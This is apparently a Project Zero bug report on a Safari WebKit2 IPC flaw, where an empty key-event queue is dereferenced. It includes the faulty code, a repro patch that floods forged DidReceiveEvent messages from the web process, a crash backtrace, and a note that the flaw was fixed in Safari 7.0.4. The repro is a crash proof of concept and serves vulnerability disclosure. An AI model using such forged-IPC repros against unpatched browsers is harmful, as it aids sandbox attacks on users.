|
|
Safari sandbox IPC memory corruption with WebEvent::Char | |||||
| Project Member Reported by ianbeer@google.com, Apr 3 2014 | Back to list | |||||
The handler for the WebPageProxy::DidReceiveEvent IPC message fails to check that the WTF::Deque m_keyEventQueue is not empty before calling first() when processing an event of type WebEvent::Char:
void WebPageProxy::didReceiveEvent(uint32_t opaqueType, bool handled)
...
case WebEvent::Char: {
LOG(KeyHandling, "WebPageProxy::didReceiveEvent: %s", webKeyboardEventTypeString(type));
NativeWebKeyboardEvent event = m_keyEventQueue.first();
MESSAGE_CHECK(type == event.type());
m_keyEventQueue.removeFirst();
if (!m_keyEventQueue.isEmpty())
m_process->send(Messages::WebPage::KeyEvent(m_keyEventQueue.first()), m_pageID);
m_pageClient.doneWithKeyEvent(event, handled);
if (handled)
break;
if (m_uiClient->implementsDidNotHandleKeyEvent())
m_uiClient->didNotHandleKeyEvent(this, event);
break;
...
Not sure about the security implications. I haven't looked into this one very much, but the NativeWebKeyboardEvent does contain some interesting pointers on some platforms.
Repro patch, apply and scroll a webpage:
Source/WebKit2/WebProcess/WebPage/EventDispatcher.cpp:
ScrollingTree::EventResult result = scrollingTree->tryToHandleWheelEvent(platformWheelEvent);
if (result == ScrollingTree::DidHandleEvent || result == ScrollingTree::DidNotHandleEvent) {
- sendDidReceiveEvent(pageID, wheelEvent, result == ScrollingTree::DidHandleEvent);
+ for (int i = 0; i < 128; i++){
+ WebProcess::shared().parentProcessConnection()->send(Messages::WebPageProxy::DidReceiveEvent(static_cast<uint32_t>(7), false), pageID);
+ }
return;
}
}
Crash Stack (null pointer dereference)
(lldb) bt
* thread #1: tid = 0x15bcc, 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::WebKeyboardEvent::WebKeyboardEvent(WebKit::WebKeyboardEvent const&) at WebEvent.h:214, queue = 'com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
frame #0: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::WebKeyboardEvent::WebKeyboardEvent(WebKit::WebKeyboardEvent const&) at WebEvent.h:214
frame #1: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::NativeWebKeyboardEvent::NativeWebKeyboardEvent(this=0x00007fff55691e3c) at NativeWebKeyboardEvent.h:60
frame #2: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WTF::Deque<WebKit::NativeWebKeyboardEvent>::first(this=0x00007fff55691e3c) + 20 at NativeWebKeyboardEvent.h:60
frame #3: 0x000000010b0b4eec WebKit2`WebKit::WebPageProxy::didReceiveEvent(this=0x00007fa3a1824818, opaqueType=7, handled=false) + 92 at WebPageProxy.cpp:3707
frame #4: 0x000000010b0d3648 WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (WebKit::WebPageProxy::*)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) [inlined] void IPC::callMemberFunctionImpl<WebKit::WebPageProxy, void (args=0x0000000000000007, __t=0x0000000000000007, object=<unavailable>)(unsigned int, bool), std::__1::tuple<unsigned int, bool>, 0ul, 1ul>(WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool), std::__1::tuple<unsigned int, bool>&&, std::index_sequence<0ul, 1ul>) + 73 at HandleMessage.h:16
frame #5: 0x000000010b0d362a WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (WebKit::WebPageProxy::*)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) [inlined] void IPC::callMemberFunction<WebKit::WebPageProxy, void (args=0x0000000000000007, __t=0x0000000000000007)(unsigned int, bool), std::__1::tuple<unsigned int, bool>, std::make_index_sequence<2ul> >(std::__1::tuple<unsigned int, bool>&&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) at HandleMessage.h:22
frame #6: 0x000000010b0d362a WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (decoder=<unavailable>, object=<unavailable>, function=<unavailable>)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) + 43 at HandleMessage.h:117
frame #7: 0x000000010b0d0c8e WebKit2`WebKit::WebPageProxy::didReceiveMessage(this=0x00007fa3a1824818, connection=<unavailable>, decoder=0x00000001139b4958) + 916 at WebPageProxyMessageReceiver.cpp:214
frame #8: 0x000000010afb77d5 WebKit2`IPC::MessageReceiverMap::dispatchMessage(this=<unavailable>, connection=0x0000000110707780, decoder=0x00000001139b4958) + 125 at MessageReceiverMap.cpp:87
frame #9: 0x000000010af64947 WebKit2`WebKit::ChildProcessProxy::dispatchMessage(this=<unavailable>, connection=<unavailable>, decoder=<unavailable>) + 13 at ChildProcessProxy.cpp:118
frame #10: 0x000000010b0fd328 WebKit2`WebKit::WebProcessProxy::didReceiveMessage(this=0x000000010ee18a80, connection=0x0000000110707780, decoder=0x00000001139b4958) + 24 at WebProcessProxy.cpp:364
frame #11: 0x000000010af65afc WebKit2`IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::MessageDecoder, std::__1::default_delete<IPC::MessageDecoder> >) [inlined] IPC::Connection::dispatchMessage(decoder=<unavailable>, this=<unavailable>) + 94 at Connection.cpp:770
frame #12: 0x000000010af65aef WebKit2`IPC::Connection::dispatchMessage(this=0x0000000110707780, message=0x00007fff55692020) + 81 at Connection.cpp:791
frame #13: 0x000000010af67b70 WebKit2`IPC::Connection::dispatchOneMessage(this=0x0000000110707780) + 106 at Connection.cpp:817
frame #14: 0x000000010a95aa45 JavaScriptCore`WTF::RunLoop::performWork() [inlined] std::__1::function<void (this=0x00007fff556920e0)>::operator()() const + 421 at functional:1435
frame #15: 0x000000010a95aa3b JavaScriptCore`WTF::RunLoop::performWork(this=0x000000010ee07f30) + 411 at RunLoop.cpp:104
frame #16: 0x000000010a95b122 JavaScriptCore`WTF::RunLoop::performWork(context=<unavailable>) + 34 at RunLoopCF.cpp:38
frame #17: 0x00007fff871bb731 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
frame #18: 0x00007fff871acea2 CoreFoundation`__CFRunLoopDoSources0 + 242
frame #19: 0x00007fff871ac62f CoreFoundation`__CFRunLoopRun + 831
frame #20: 0x00007fff871ac0b5 CoreFoundation`CFRunLoopRunSpecific + 309
frame #21: 0x00007fff90fb1a0d HIToolbox`RunCurrentEventLoopInMode + 226
frame #22: 0x00007fff90fb17b7 HIToolbox`ReceiveNextEventCommon + 479
frame #23: 0x00007fff90fb15bc HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 65
frame #24: 0x00007fff8db9e3de AppKit`_DPSNextEvent + 1434
frame #25: 0x00007fff8db9da2b AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 122
frame #26: 0x00007fff8a241290 Safari`-[BrowserApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 161
frame #27: 0x00007fff8db91b2c AppKit`-[NSApplication run] + 553
frame #28: 0x00007fff8db7c913 AppKit`NSApplicationMain + 940
frame #29: 0x00007fff8a41306d Safari`SafariMain + 267
frame #30: 0x00007fff83a405fd libdyld.dylib`start + 1
frame #31: 0x00007fff83a405fd libdyld.dylib`start + 1
Project Member
Comment 1
by
ianbeer@google.com,
Apr 3 2014
,
Apr 4 2014
,
Apr 4 2014
Apple follow up id: 605055598
,
Apr 4 2014
,
May 22 2014
Fixed in Safari 7.0.4
,
Jul 31 2014
|
||||||
| ► Sign in to add a comment | ||||||